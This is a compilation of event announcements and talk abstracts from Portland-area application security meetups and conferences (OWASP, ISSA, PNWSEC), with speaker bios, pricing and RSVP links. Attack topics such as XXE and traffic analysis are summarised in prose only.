Spring Training

Day 1:

1) Keynote: Blockchain: More that Cryptocurrency: Michael Reed (Intel)

Presentation on the origin of blockchain technologies and its evolution to a key technology in pursuit of increased efficiencies and new business models. Is your enterprise ready for blockchain?

2) Micro Segmentation and Cloud-A blueprint for protecting your golden egg: Tyler Hardison (RedHawk Security) (EVENT SPONSOR)

3) Benefiting from PCI – Even if Compliance is Not Required: Bowe Hoy (Sword&Shield) and Mike Griffin (Circle K Stores, Inc.)

The Payment Card Industry Data Security Standard (PCI DSS) can be beneficial to your organization, even if compliance to it is not a requirement. PCI DSS features a number of valuable guidelines to help your organization improve its security posture, technology auditing, and business operations. This session will help you understand the key components of PCI DSS and how your organization can benefit from implementing it. You will receive practical lessons through case studies about organizations that have successfully implemented PCI DSS. Whether these organizations were required to comply with PCI DSS, or chose to adopt it – they became a better organization because of it. And you can learn how to do the same for your organization.

4) Certificate Security and Frameworks for a Public CA: Derek Thomas and Scott Perry

As the ubiquity of on-line shopping continues to amplify our digital environment, ensuring a trusted on-line transaction becomes critical to building the brand loyalty and experience once relished within the physical brick and mortar retailer. The ability to ensure a trusted and secure transaction is not new, however the scrutiny placed on that trust is at an all time high with significant changes in the issuing community and the scrutiny ensuing from the browser community for secure and reliable trusted certificates.

In this presentation, Scott Perry, Partner and Derek Thomas, Managing Director, of Scott Perry CPA, one of six licensed CPA firms performing Certificate Authority audits, will discuss the changing landscape of on-line transactional trust and the requirements of Certificate Authorities. The presentation will include a discussion and overview of an established but less known framework for evaluating and auditing the performance of Certificate Authority practices and considerations applied to evaluating the security of your on-line transactions.

Day 2: 5 Sessions: Various Presenters

5) Current Economics of Cyber: David Hobbs: Radware

Often we discuss the changing threat landscape from a pure technical or vulnerability picture, however this does an injustice to element of ease, cost and access to attacks. This presentation will provide attendees with an up-to-date picture of the rapidly changing landscape of attack tools and services, the buying criteria and locations for these the tools and ease of use. In addition, the presentation will provide an understanding of how the combination of the proliferation of these tools and their corresponding use has dramatically changed the dynamics of the return on defense strategies. This presentation will provide unique insight into the world of the Darknet, specific customer attack stories, new economic models of measuring security deployments and a refreshed look at how controls should be deployed going forward.

6) Cyber War Chronicles - Stories From the Virtual Trenches (ERT Report 2017): David Hobbs: Radware

From information shared by over 1250 companies on their top concerns, we talk about what happened in 2017 and predict the top trends of 2018 in cyber security. The first half of 2017 saw a continuation of some cyber-security threats, as well as the emergence of some attack types and trends. Ransom attacks, political hacks, and new dynamics around the accessibility and capability of attack tools have added even more challenges to security. This session will explore some of the latest evolutions of the threat landscape, through a combination of market intelligence, real-world case studies, and direct insights from those on the front lines of cyber-security.

7) OWASP Updated Top10: Alex Ivkin (ISACA Board)

 A detailed technical review of the OWASP top 10.

8) The Value of Cyber Certifications: Alex Ivkin (ISACA Board)

9) Fraud Audit in a Digital Environment: Sarah Dalton: E&Y

CPE: 14 CPE

Cost:

Regular Pricing: On or After 4/20/18:

ISACA or IIA Member: $185

Non-Member: $225

We hope to see you there!

PNWSEC, aka, Pacific Northwest Application Security Conference is a free application security conference that will be held Saturday, June 19th. It is a virtual, online event sponsored by the OWASP chapters of Portland, Vancouver, and Victoria.

Kymberlee Price and Jim Manico to keynote! All of the speakers and workshops can be found on the website: https://pnwcon.com/

Stretching the Truth: Attacking the Elastic Agent By Zander Work

Starting Left with Cloud Security By Stefania Chaplin

Fuzzing Python Native Extensions By Lucas Amorim

CVE-2020-17049: Kerberos Bronze Bit Attack By Jake Karnes

Zero-Trust - The Paradigm Shift Required in a Post-pandemic World By Timothy Morgan

Ad-Tech for Security People By Will Whittaker

Secure Coding of Industrial Control Systems By Vivek Ponnada

Six Ways Known-vulnerabilities Sneak Into Docker Containers By Julius Musseau

Effects Malware Hunting in Cloud Environment By Filipi Pires

Honeytokens: Detecting attacks to your web apps using decoys and deception By Dana Epp

Don’t B-MAD: Making Threat Modeling Less Painful By Adam Shostack

Women in Appsec: Advice to Differentiate Your Skills By Aarti Gadhia

Cultivating Cyber Warriors By Patterson Cake

Insiders Guide to Mobile AppSec with OWASP MASVS By Brian Reed

Follow us on Twitter at @pnwseccon to see when the workshops are going to be released.

RSVP: https://www.meetup.com/OWASP-Portland-Chapter/events/277480846/

Excerpt:

Traditionally, breaches that make the news are about stealing data and that data being resold for financial gains. Think Target, Ashley Madison, Marriott and so many more. Recently a spotlight was put on supply chain security via the SolarWinds breach and how that affected many companies. The adversaries were able to inject malicious code into applications that have a lot or rights and are widely deployed in many organizations, small and large alike.

We will discuss the framework, your SDLC (SDL, SSDLC, etc.) – Secure Development Lifecycle – to lay out how you are going to develop and secure your applications. Customers care about this. Once you have your SDLC, you need to define your processes, select your tools, integrate them into your SDLC and finally automate those tools. This is not a short process and often multiple iterations are necessary to get to a good place. The goal of this presentation is to make you aware of a variety of tools that are out there, the various steps along the way of your SDLC you need to take and how to complete each of these steps.

BIO:

Derek Hill has over 25 years of experience in Information Security and Information Technology. He is currently the Director of AppSec engineering at ForgeRock, an Identity and Access management company, based in Vancouver, WA. He is responsible for implementing and improving the company’s product security on a continual basis. He works closely with software engineers and security engineers in multiple countries to ensure the ForgeRock products are developed securely and tested in all phases of the development lifecycle. In addition to his full time job, Derek is also a SANS community instructor teaching Security Leadership and CISSP prep courses.

Prior to his current position, Derek held Information Security, IT management and technical roles at both large and small companies. In each role, he consistently focused on managing high-performing teams, delivering efficient solutions and providing excellent services to a variety of stakeholders, maximizing uptime and security. Derek also has significant experience in cloud technologies, responsible for moving, securing and maintaining them in various cloud environments through their lifecycle.

EVENT INFORMATION

Application security is a moving target, but the Open Web Application Security Project (OWASP) is here in Portland to help you write and deploy applications securely. Speakers James Bohem and Tim Morgan will walk you through all of the free resources made available by OWASP to developers, application architects, and information security professionals.

As an example of how OWASP can help, we'll present some of the finer points of secure web session management, covering the variety of attacks on SSL-protected web traffic if sites are not configured properly. We'll touch on cookies, state management, SSL and some common problems and solutions.

Q&A will follow. Pizza and beverages will be served.

SPEAKER INFORMATION

James Bohem manages the security program at WebMD Health Services, which includes a large web-based application with millions of users, as well as other security technologies and risk management for a 400+ person division of WebMD in Portland. James has 15 years in security consulting with a focus on application security, design and technical compliance with a range of regulations and standards. In addition, he has experience developing large distributed applications, microkernels, the UNIX kernel, and international software systems for open systems.

Tim Morgan has been taking deep technical dives in security for over a decade as an application security specialist and vulnerability researcher. Tim resides in Oregon and works as VSR where he helps to secure his customers' environments through penetration testing, training and forensic investigations. Tim also develops and maintains several open source digital forensics tools, including Bletchley, an application cryptanalysis toolkit.

In this class, we’ll be exploring how to find the vulnerabilities in OWASP Juice Shop with Burp Suite (and maybe some other security tools if we get some time). You’ll learn to set up the environment to play with in your own time. As well as learning to practically apply the different features of Burp Suite and when it is and isn’t the most optimal tool. This will help you to reproduce security vulnerabilities or help find them for bug bounty programs.

Bio: Jordan is an Application Security Engineer at New Relic and a graduate from the University of Pittsburgh with a degree in computer science. She’s Champion ranked in Rocket League and does yoga in her free time.

Seating is limited

RSVP: https://www.meetup.com/OWASP-Portland-Chapter/events/269026936/

OWASP Juice Shop: https://owasp.org/www-project-juice-shop/

Burp Suite CE: https://portswigger.net/burp/releases/professional-community-2020-1?requestededition=community

Building Security In ?

› Please RSVP via our Meetup group HERE

Everybody wants to write secure code, and yet it’s hard to find a dev team that truly owns application security. Instead, a small and external security team is tasked with keeping the constant and large amount of produced functionality secure. As we can see in daily headlines, this approach is not working, and is breaking down further in the face of high efficiency continuous deployment.

How can we fix it?

In this panel, three experts who deal with this problem on a daily basis will debate the ways dev teams can step up and build security in, touching best practices, tools, where to get started and much more.

• Guy Podjarny CEO at Snyk

Guy (@guypod) is a cofounder at Snyk.io, focusing on securing open source code. Guy was previously CTO at Akamai and founder of Blaze.io, and worked on the first web app firewall & security code analyzer. Guy is a frequent conference speaker, the author of "Responsive & Fast”, “High Performance Images” and the upcoming “Securing Open Source Code."

• John Steven CTO Cigital and Codiscope

John’s expertise runs the gamut of software security—from threat modeling and architectural risk analysis to static analysis and security testing. He has led the design and development of business-critical production applications for large organizations in a range of industries. Since joining Cigital as a security researcher in 1998, John has provided strategic direction and built security groups for many multi-national corporations, including Coke, EMC, Qualcomm, Marriott and Finra. His keen interest in automation continues to keep Cigital technology at the cutting edge. Presently, he serves as internal CTO of Cigital and CTO of Codiscope. He has served as co-editor of the Building Security In department of IEEE Security & Privacy magazine, and as the leader of the Northern Virginia OWASP chapter. He speaks regularly at conferences and trade shows. Follow John on Twitter @m1splacedsoul

• Omri Iluz Co-founder and CEO, PerimeterX

Omri is the CEO and cofounder of PerimeterX. After spending a decade and a half building and securing web scale infrastructure at companies such as Akamai, Cotendo and iPlay, Omri decided to focus on ridding the web from Bots and other automated threats. With experience that spans everything from writing code and malware reversing to modern web architecture, Omri provides a unique point of view on the current state of affairs of web security.

Details

• Doors will open at 5:30 for a 30-minute networking happy half-hour! The food, beer and drinks are provided by Bellagios and New Relic.

• The presentation will begin right at 6p.

• NOTE: after the event, everyone is invited to continue networking at a special happy hour opportunity, one story up at Portland City Grill.

› Stay tuned for the latest developments and updates on this and upcoming events by joining our Meetup group, New Relic FutureTalks PDX (link above), and following us on Twitter @newrelic. Check out our blog for event recaps and videos.

› FutureTalk is brought to you by New Relic in collaboration with TAO

Hacking a SaaS: A Practical Guide to Understanding Attackers and Defending Against Them

In this talk, we will delve into the mindset of an attacker and explore the vulnerabilities they exploit in SaaS systems. We will cover the following topics:

What motivates hackers to target SaaS systems (5%) How hackers conduct reconnaissance on SaaS systems (50%) The anatomy of exploit chains (40%) Strategies for defending against attacks (5%) Our goal is to provide a practical guide to understanding attackers and defending against them. We will share lots of hacker tips and tricks, and provide plenty of quiz moments to train your intuition. Our focus will be on vulnerabilities that hackers actually care about, rather than theoretical ones. All of our examples will be based on real-world exploit chains, and we will explore multiple vulnerabilities chained together to create media-news-headline-worthy outcomes. By the end of this talk, you will have a better understanding of how attackers think and operate, and you will be better equipped to defend against their attacks.

Our January host and sponsor is Solutional Inc, and the talk will take place in their Portland office at 301 SE 2nd Ave.

Please RSVP here if you are planning to attend.

This is a monthly event of OWASP's Portland chapter.

Join the SAO's QA Forum for another dynamic lunch program, to learn about the Open Web Application Security (OWASP) Testing Guide v3 and how to verify the security of your running applications. This is a great opportunity to network with a great local speaker (Mike Hryekewicz, Software Engineer V, Standard Insurance Company) and industry peers and to find out about Oregon job openings and upcoming community events.

OWASP Testing Guide describes a set of techniques for finding different kinds of security vulnerabilities within an application. This technique is used by testers and developers to help produce secure code and to supplement security reviewers application assessment efforts.

This presentation will provide an overview of the guide, a road map for where it is heading in the next release, and guidance for how it can be applied in the business of producing secure software solutions.

Who should attend? Anyone interested in Web Application Security, including management, security professionals, developers, students, etc..

Agenda 11:00am Doors open 11:00am-11:30am Registration, networking and lunch 11:30am Welcome & Community Announcements 11:45am Program starts 12:50pm Final questions 1:00pm Program ends

Presentation: Pitfalls of Web Session Management

Login session management in modern web applications is largely applications dominated by use of HTTP cookies. However, HTTP cookies were never designed for secure applications, which has led to a significant number of protocol security problems. In this talk, the speaker will start with a brief background on why HTTP cookies are a poorly-conceived mechanism to begin with, and continue with a discussion of how this impacts security. He will describe several lesser-known cookie-based session management problems that remain wide spread and allow for session hijacking through a variety of clever attacks.

Who:
Timothy D. Morgan
Principal Security Consultant - Blindspot Security LLC
As an application security consultant and vulnerability researcher, Tim has been taking deep technical dives in security for over a decade. In that time, he has been credited with the discovery and responsible disclosure of numerous security vulnerabilities in a variety of software products, including: IBM Tivoli Access Manager, Sun Java Runtime Environment, Google Chrome Web Browser, OpenOffice, Oracle WebLogic Application Server, and IBM Websphere Commerce. His current research interests include applied cryptanalysis, IPv6 security and XML external entities attacks. Tim develops and maintains several open source forensics tools in addition to Bletchley, an application cryptanalysis toolkit.

Tim works to secure his customers' environments through black box testing, code reviews, social engineering evaluations, security training and a variety of other services. Tim earned his computer science degrees from Harvey Mudd College and Northeastern University and currently resides in Portland Oregon where he leads the local OWASP chapter

Cost: $10 (member) / $15 (non-member) / $2 (at-the-door)

CPEs: The ISSA meetings are appropriate for CPE credit. The chapter maintains proof of attendance for members but it is the members responsibility to ensure that these CPE's are credited to their respective accounts.

Join us for ISSA Portland panel discussion of current cyber threat landscape.

Thursday - October 18th, 2018 11:30AM - 1:00PM

Please go to the link below and check it out and register today.

Here is the link to the Eventbrite notice:

https://www.eventbrite.com/e/panel-discussion-tracking-the-current-cyber-threat-landscape-tickets-50695136518

Panel Participants:

Brian Ventura, Security Architect City of Portland Craig Schippers, Principal Field Engineer, Trend Micro Cam Naghdi, Sales Engineering Manager, Malwarebytes

Moderator:

Christopher Paidhrin, CISO, City of Portland Topics to include: Quarterly update Trends in threat intelligence The role of AI in malware detection Defense in depth techniques Cloud defenses Panel Participants:

Brian Ventura, Security Architect City of Portland About the panelist: Brian is an Information Security Architect for the City of Portland and a SANS Instructor. Brian volunteers with the ISSA Portland chapter as the Director of Education and with OWASP locally. Over the past 25 years, Brian achieved, holds, and now teaches various industry certifications including CISSP, GSEC, GCIH, GCFA, and GCCC. In addition to his Information Security persona, Brian is a member of the Timbers Army and Thorns Riveters, attending as many games as possible. Find Brian's teaching schedule: https://www.sans.org/instructors/brian-ventura

Cameron Naghdi, Systems Engineering Manager, Malwarebytes About the Panelist: Cameron Naghdi is the Systems Engineering Manager for US-West at Malwarebytes. Cameron has worked for multiple endpoint technology firms and has supported many vertical markets from retail and healthcare up to Federal/Civilian agencies and the Department of Defense. Cameron is also on the technology advisory board of 802Secure and is Co-Founder and CTO at FilecheckIO. Cameron specializes in understanding the threats of today and how to prepare solutions to address both today's and future security challenges.

Chris Sestito, Director of Threat Research, Cylance About the panelist: Chris Sestito manages the Cylance Threat Research Team, which consists of 30 researchers dedicated to data-science-based analysis and automation development. Chris is based in Austin, Texas and is an eight-year veteran in information security with a wealth of experience in malware analysis and malvertising that helps ensure the security of Cylance customers. Chris also holds Sec+ and C|EH certifications.

Craig Schippers, Principal Field Engineer, Trend Micro About the Panelist: Craig Schippers is a CISSP Certified Principal Field Engineer at Trend Micro. He has worked in the security industry for approximately 17 years, assisting customers with their Infrastructure Security needs. Craig lives in Portland, Oregon.

Moderator: Christopher Paidhrin, CISO, City of Portland and ISSA Portland Vice-President About the moderator: Christopher Paidhrin, is the Chief Information Security Officer for City of Portland, Oregon. For the past 17 years Christopher has been a nationally recognized healthcare Information Security authority, having received recognition, nominations and awards for service excellence, including Network World, ISE, SC Magazine, and Information Security magazine's 2011 "Security 7" Award. Christopher is a regular media consultant and presents at numerous events across the U.S. Christopher is an advocate of IT Service Management (ITSM) best practices and process improvement, including learning organizations and knowledge management.

This event is sponsored by: Malwarebytes and Trend Micro

Hosted by the ISSA – Portland Chapter, the NW ISSA Security Summit, held in conjunction with InnoTech Oregon, returns April 21st to the Oregon Convention Center. Join us for this one-day, in-depth conference that highlights the latest in the IT Security landscape. If you only go to one conference this year, make this the one!

The NW ISSA Security Summit will feature three (3) distinct conference tracks: 1) Business

2) Application Development

3) Technology

Each track will be comprised of top notch sessions from leading industry professionals. Whether you are an application developer, security manager, IT manager, engineer, auditors, CISO, CTO, Project Manager, or just simply interested in the security sector, the Summit is meaningful to you. Mark your calendars for April 21st and we’ll see you there! Go to www.nwsecuritysummit.com to REGISTER and more information.

FLOSSHack is an experimental workshop project designed to bring together those who want to learn more about "hacking" (secure programming and application penetration testing) with those who are in need of low cost or pro bono security auditing.

The target software for this FLOSSHack event is OpenMRS. For more info, see the event page.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Join us for a How to (FLOSS)Hack tutorial, which will introduce several common classes of web application vulnerabilities such as XSS, SQL injection, and XML External Entities flaws. The goal of the session is to bring novice FLOSSHack participants up to speed on how to identify new vulnerabilities that are likely to appear in the target software for this week's FLOSSHack. FLOSSHack is an experimental workshop project designed to bring together those who want to learn more about "hacking" (secure programming and application penetration testing) with those who are in need of low cost or pro bono security auditing.

NOTE: For best results, please bring a laptop to participate in the hands-on exercises.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Talk

At the end of the day, security depends on code. Secure software demands secure code, configuration, management, testing, and constant improvement.

Security automation aligns perfectly with the modern, fast-paced environments like continuous delivery that are quickly seeping into companies of all kinds.

Automation provides drastic results with little effort, but quickly reaches a plateau where the effort involved in finding better results that provide value rises above the value of focusing elsewhere.

In this talk, I will focus on some of the lesser discussed topics of security automation and how they relate to the lines of code that produce the reason why we are discussing security automation today. The goal is to give a complete understanding of the ways that companies like _ and _ have produced secure code that runs their web applications.

Speaker

Neil is currently an engineer at GitHub, co-founder of Brakeman Security Inc., and OWASP Orange County board member. Formerly, he was an application security engineer at Twitter, OC Ruby leader, and AppSec California organizer. Neil enjoys long walks on the beach, long walks in the woods, and long walks anywhere really. His turnoffs include noisy offices, noisy people, and noisy anything really.

• Twitter @ndm
• GitHub @oreoshake

Bob Loihl will be presenting:
Secure Software Development Life Cycle in an Agile World
In this day and age we must do everything we can to produce secure software. But how you ask? I will be talking about some of the options available and how to get an initiative started in your workplace/project. I will cover some of the choices out there for Agile Development and then we'll examine one choice, BSIMM (https://www.bsimm.com/), in more depth. I will follow that up with a discussion of some of the challenges and some of the benefits of implementing an SSDLC.

Bob Loihl is a Software Engineer with 20+ years of experience developing business applications, leading teams and spreading the security word. He has a strong interest in delivering applications that are secure by design in an agile world. He has been helping Tripwire grow and mature its development processes for the last 10 years and his current hobby is incorporating SSDLC (Secure Software Development Life-Cycle) processes into the software manufacturing process. Bob is passionate about family, software, canoes and guitars. In his spare time he works at Tripwire producing high quality software using Agile methodologies. Oh yeah, he cares a tiny bit about security.

---

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list:

 https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

People in Information Security say passwords are dead. Yet the replacement solutions are not available or main stream. An independent developer, Steve Gibson, decided to do something about it and created SQRL. From his website "Proposing a comprehensive, easy-to-use, high security replacement for usernames, passwords, reminders, one-time-code authenticators . . . and everything else." Let's talk about what SQRL is, how it works, how it could work in your solution and does it have competitors.? I am as interested in your feedback as I hope you are interested in resolving the password problem!

Brian Ventura is an Information Security Architect at the City of Portland and 21 years experience in IT. Brian has enterprise, consulting and project management experience, supplying secure solutions to internal and external customers. Brian is mentoring a SANS MGT414 course in Portland between April 14th and Jun 16th. You can find more information at https://www.sans.org/instructors/brian-ventura

Software development is speeding up; Waterfall to Agile to Continuous Integration to Continuous Deployment. Do we still have time for security? Of course we do! But many development shops are unaware how to add security to their development process and will often use "security slows us down" as a reason to produce insecure code. This talk focuses on how to add security into a speedy development process while still remaining fast and responsive to customer requests.

The speaker will be Joe Basirico - the VP of Services for Security Innovation. Before he started leading the team, he was a developer, trainer, researcher, and security engineer. Joe spent the majority of his professional career analyzing software security behavior and researching how software development organizations mature over time from a security perspective. Through this research, he developed an understanding of application threats, tools, and methodologies that assist in the discovery and removal of security problems both software- and process-related. He manages the company’s engineering blog and has written several publications and tools that focus on source code level vulnerabilities.

Joseph Arpaia, MD will be presenting: Hiding in Plain Sight: A Mnemonic Method For Creating Secure Passwords

The human brain is not suited to recalling secure passwords composed of random sequences of characters especially if they are not used regularly. Humans are excellent at recalling sentences, even years after learning them, e.g. nursery rhymes, song lyrics. This ability can be used to create a mnemonic method for generating a large number of passwords from one remembered passphrase, even if the passphrase and the associated characters are not kept secret.

Joseph Arpaia received his BS in Chemistry from CalTech and his MD from UC Irvine where he also did research in electrophysiology and applications of chaos theory to psychiatry. He is a psychiatrist in private practice in Eugene, OR and applies heart rate variability analysis in his work with patients. He also teaches applications of mindfulness meditation to psychotherapy at the University of Oregon and is the co-author of Real Meditation in Minutes a Day. He has a long-standing interest in passwords and security which dates back to his experience at age 8 when he came up with a Vernam cipher in response to a challenge by his father to encrypt a text message.

---

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Tim Morgan will be presenting: What You Didn't Know About XML External Entities Attacks

The eXtensible Markup Language (XML) is an extremely pervasive technology used in countless software projects. Certain features built into the design of XML, namely inline schemas and document type definitions (DTDs) are a well-known source of potential security problems. Despite being a publicly discussed for more than a decade, a significant percentage of software using XML remains vulnerable to malicious schemas and DTDs. This talk will describe a collection of techniques for exploiting XML external entities (XXE) vulnerabilities, some of which we believe are novel. These techniques can allow for more convenient file content theft, sending of arbitrary data to arbitrary internal TCP services, uploads of arbitrary files to known locations on a vulnerable system, as well as several possible denial of service attacks. We hope this talk will raise awareness about the overall risk associated with XXE attacks and will provide recommendations that developers and XML library implementors can use to help prevent these attacks.

Tim Morgan is credited with the discovery and responsible disclosure of several security vulnerabilities in commercial off-the-shelf and open source software including: IBM Tivoli Access Manager, Real Networks Real Player, Sun Java Runtime Environment, Google Chrome Web Browser, OpenOffice, and Oracle WebLogic Application Server. Tim develops and maintains several open source forensics tools as well as Bletchley, an application cryptanalysis tool kit. Tim regularly speaks and delivers technical training courses, his next of which will be on cryptography for developers at AppSecUSA 2014.

---

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Ian Melven will be presenting: The Evolving Web Security Model

Is there a single cohesive model for the web ? No, there is not. What exists today is the result of the original same-origin policy and its evolution in many directions as a response to new threats and attacks. Where did we start, what tools are available to web developers to protect their sites and users, and where might we go in the future as the line between websites and native applications continues to become more and more blurry ? Join us on a journey through the past, present, and future of the web security model and its continuing evolution.

Ian Melven is an application security engineer at New Relic. He has previously worked in technical security roles at companies including Mozilla, Adobe, McAfee, Symantec, and @stake.

---

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list:

 https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Kevin Dyer will be presenting:

High-Profile Password Database Breaches: A Tale of (Avoidable) Blunders

Over the last few years, password database breaches reported in mainstream press have increased in frequency and magnitude. There is a typical pattern and service providers, such as Adobe or Yahoo or Snapchat, fail on at least two fronts: first, network perimeters and databases are breached and then, improperly secured user data and passwords are exfiltrated and shared in cleartext. Even if the former can't be prevented, there are security best practices to mitigate the impact of the latter, which are (seemingly) ignored.

In this talk, we'll discuss specific case studies and review the essential security best practices for storing sensitive user information. The goal is to show that in every case free, off-the-shelf tools are available, that would have mitigated the scope of the breach and (possibly) the onslaught of negative publicity. As one example, we'll build intuition for why using Scrypt (a memory-hard function) is superior to traditional cryptographic hash functions for storing passwords.

Kevin P. Dyer is a PhD student at Portland State University. His research focuses on network security and building protocols resistant to traffic-analysis attacks and censorship. Previously, Kevin worked as a software engineer in telecommunications security, web security and network security. He holds an MSc in the Mathematics of Cryptography and Communications from Royal Holloway, University of London, and a BS in Computer Science with Mathematics from Santa Clara University.

---

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list:

 https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Stephen A. Ridley will be presenting on the vulnerability of mobile applications

UPDATE: New Relic will be providing pizza for attendees. Yum.

---

Stephen A. Ridley is a security researcher and author with more than 10 years of experience in software development, software security, and reverse engineering. Within that last few years, he has presented his research and spoken about reverse engineering and software security research on every continent except Antarctica. Stephen and his work have been featured on NPR and NBC and in Wired, Washington Post, Fast Company, VentureBeat, Slashdot, The Register, and other publications. Prior to his current work Mr. Ridley previously served as the Chief Information Security Officer of a financial services firm. Prior to that, various information security researcher/consultant roles including his role as a founding member of the Security and Mission Assurance (SMA) group at a major U.S. Defense contractor where he did vulnerability research and reverse engineering in support of the U.S. Defense and Intelligence community. Mr. Ridley calls Portland home and was a recent speaker at the Chaos Communication Congress in Hamburg.

---

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list:

 https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Kevin P. Dyer presents:

P0wning DPI with Format-Transforming Encryption

Deep packet inspection (DPI) technologies provide much-needed visibility and control of network traffic using port- independent protocol identification (PIPI), where a network flow is labeled with its application-layer protocol based on packet contents. In many cases PIPI can be used for good. As one example, it allows network administrators to elevate priority of time-sensitive (e.g., VoIP) data streams. In other cases PIPI can be used for harm, nation-states employ PIPI to block censorship circumvention tools such as Tor. There are many ways to perform PIPI, however, at the core of nearly all modern PIPI systems are regular expressions --- an expressive tool to compactly specify sets of strings.

In this talk, Kevin reviews the state-of-the-art research on the capabilities of state-level DPI, then presents a novel cryptographic primitive called format-transforming encryption (FTE.) An FTE scheme, intuitively, extends conventional symmetric encryption with the ability to transform the ciphertext into a user-defined format using regular expressions. An FTE-based record layer will be presented that can encrypt arbitrary TCP traffic and coerce modern DPI systems into misclassifying any data stream as a target protocol (e.g., HTTP, SMB, RSTP, etc.) of the user's choosing. What's more, this work is not only theoretical in nature --- an open-source FTE prototype is publicly available and has had success in subverting modern DPI systems, including the Great Firewall of China.

PSU is kindly providing coffee, tea, and cookies for us.

---

Kevin P. Dyer is a PhD student at Portland State University. His research focuses on building protocols that are resistant to traffic-analysis attacks and discriminatory routing policies.. Previously, Kevin worked as a software engineer in telecommunications security, web security and network security. He holds an MSc in the Mathematics of Cryptography and Communications from Royal Holloway, University of London, and a BS in Computer Science and Mathematics from Santa Clara University.

---

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list:

 https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Matthew Lapworth will present a talk on static code analysis.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Chapter meetings are free and open to the public.

Double Feature! For this chapter meeting, we have two protocol-oriented talks at PSU. Basic refreshments will be provided.

Kevin P. Dyer presents:
What Encryption Leaks and Why Traffic Analysis Countermeasures Fail

As more applications become web-based, an increasing amount of client-server interactions are exposed to our networks and vulnerable to Traffic Analysis (TA) attacks. In one form, TA attacks exploit the lengths and timings of packets in a protocol's flow to infer sensitive information about communications. In the context of encrypted HTTP connections, such as HTTP over SSH, this means an adversary can determine which website a user is visiting. In the context of a specific web application, an adversary can determine user input by viewing only a few client-server interactions.

Recent advances in the application of Machine Learning tools demonstrate that TA attacks are possible despite industry-standard encryption such as TLS, SSH or IPSec. What is more, even if a protocol uses stronger countermeasures, such as fixed-length per-packet padding, this incurs significant overhead but only provides limited security benefit. These types of security vs. efficiency trade-offs are of immediate concern to security-aware applications such as Tor, and performance-sensitive application features such as Google Search Autocomplete.

In this talk, Kevin will address the state-of-the-art TA attacks and proposed countermeasures in the context of network and web application security. Most importantly, he will discuss open problems in this area and why a general-purpose TA countermeasure remains elusive.

Timothy D. Morgan presents:
HTTPS, Cookies, and Men-in-the-Middle: Why You Shouldn't Allow Marketing Departments to Design Your Security Protocols

Login session management in modern web applications is largely dominated by use of HTTP cookies. However, HTTP cookies were never designed for secure applications, which has led to a significant number of protocol security problems.

In this talk, Tim will start with a brief background on why HTTP cookies are a poorly-conceived mechanism to begin with, and continue with a discussion of how this impacts security. He will describe several lesser-known cookie-based session management problems that remain wide spread and allow for session hijacking through a variety of clever attacks.

---

Kevin P. Dyer is a PhD student at Portland State University. His research focuses on building protocols that are resistant to Traffic Analysis attacks. Prior to his academic life, Kevin worked as an engineer on various projects in telecommunications security, web security and network security. Kevin holds an MSc in the Mathematics of Cryptography and Communications from Royal

Holloway, University of London, and a BS in Computer Science and Mathematics from Santa Clara University.

Timothy D. Morgan is a consultant at Virtual Security Research, LLC (VSR). As an application security specialist and digital forensics researcher, Tim has been taking deep technical dives in security for over a decade. Tim resides in Oregon and works at VSR where he helps to secure his customers' environments through penetration testing, training, and forensics investigations. His past security research has culminated in the release of several responsibly disclosed vulnerabilities in popular software products. Tim also develops and maintains several open source digital forensics tools which implement novel data recovery algorithms.

---

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software.

This chapter meeting feature guest speaker Kevin Johnson, a senior SANS instructor.

Jim Manico has offered to come to Portland and do a presentation on Top 10 web coding defenses. Jim has many years experience in the web application security space and currently works with WhiteHat Security & SANS.

